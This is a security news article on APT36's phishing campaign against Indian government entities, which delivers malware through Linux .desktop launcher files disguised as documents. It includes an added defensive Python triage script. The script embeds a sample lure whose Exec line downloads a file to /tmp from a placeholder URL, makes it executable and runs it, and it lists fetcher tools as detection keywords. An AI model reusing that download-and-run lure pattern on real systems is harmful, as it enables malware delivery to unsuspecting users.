Pakistani Hackers Back at Targeting Indian Government Entities

Pakistani state-sponsored hacking group APT36 is targeting Linux systems in a fresh campaign aimed at Indian government entities.

Pakistan-linked state-sponsored cyberspies are targeting Indian government and defense entities with tailored malware in a fresh campaign, security researchers warn.

Active since at least 2013 and also tracked as Earth Karkaddan, Mythic Leopard, Operation C-Major, and Transparent Tribe, APT36 is known for its cyberespionage campaigns aimed at Indian government entities.

In attacks carried out in August 2025, APT36 has been relying on a new infection technique: the use of Linux desktop entry (.desktop) files for malware delivery. These are plain text configuration files defining shortcuts and launchers and containing metadata about applications.

Delivered as part of a procurement-themed phishing campaign, the malicious files were packed inside ZIP archives, masquerading as documents. When opened, they would fetch a dropper from Google Drive and simultaneously display a decoy PDF file in Firefox, CloudSEK reports.
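As an added illustration of how a defender can triage the launcher files described above (this is example code written for this page, not CloudSEK's or Cyfirma's tooling), the following Python script parses a .desktop entry and flags the combination the campaign relies on: a document-looking name or icon paired with an Exec line that wraps a shell command, fetches from a URL, and stages an executable. The sample entries, URL and paths are constructed placeholders, not indicators from the campaign.

```python
import configparser
import re
import shlex

# Constructed sample shaped like the lure described in the article: a document-named
# launcher that fetches a payload and opens a decoy. URL and paths are placeholders.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Procurement_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s https://drive.example.invalid/d/PLACEHOLDER -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x & firefox /tmp/decoy.pdf"
"""

# Constructed benign launcher for comparison.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Icon=firefox
Terminal=false
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)$", re.IGNORECASE)
SHELL_WRAPPERS = {"sh", "bash", "dash", "zsh"}
FETCHERS = {"curl", "wget", "python", "python3", "perl", "base64"}


def assess_desktop_entry(text: str) -> list[str]:
    """Return findings for a .desktop file body; an empty list means nothing was flagged."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return ["missing [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    name, icon, exec_line = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    findings = []
    if DOC_EXT.search(name) or "pdf" in icon.lower():
        findings.append("launcher presents itself as a document")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        return findings + ["Exec line is not parseable"]
    # sh -c "..." hides the real command line behind an interpreter invocation
    if argv and argv[0].rsplit("/", 1)[-1] in SHELL_WRAPPERS and "-c" in argv[1:2]:
        findings.append("Exec wraps an inline shell command")
    tokens = set(re.findall(r"[A-Za-z0-9_.-]+", exec_line))
    fetch = FETCHERS & tokens
    if fetch and "://" in exec_line:
        findings.append(f"Exec downloads from a URL using {sorted(fetch)}")
    if "/tmp/" in exec_line and "chmod" in tokens:
        findings.append("Exec writes to /tmp and marks the file executable")
    if len(findings) >= 2:
        findings.append("HIGH: document-themed launcher with download-and-run behaviour")
    return findings
```

Running the function over every .desktop file found in a mail attachment quarantine or in users' autostart and Desktop directories gives a quick first-pass triage; a genuine document launcher should never need a shell wrapper or a network fetch.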

The dropper performs anti-debugging and anti-sandbox checks, sets up persistence on the system, and attempts to establish communication with the command-and-control (C&C) server using WebSockets.

“The use of Google Drive in their attack lifecycle represents a significant evolution in the threat group’s capabilities, introducing spear-phishing vectors that pose higher risks to Linux-based government and defense infrastructure,” CloudSEK notes.

The use of malware tailored specifically for Linux Boss environments shows an increase in APT36’s sophistication and flexibility, Cyfirma explains in a separate report.

“APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls,” the cybersecurity firm says.

The phishing emails observed by Cyfirma featured meeting notice themes but relied on the same infection mechanism, using .desktop files as loaders.

The security firm also points out that, while it remains focused on Indian government entities and adjacent sectors, APT36 was also seen opportunistically targeting organizations in other countries.

“The adoption of .desktop payloads targeting Linux Boss reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments,” Cyfirma notes.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.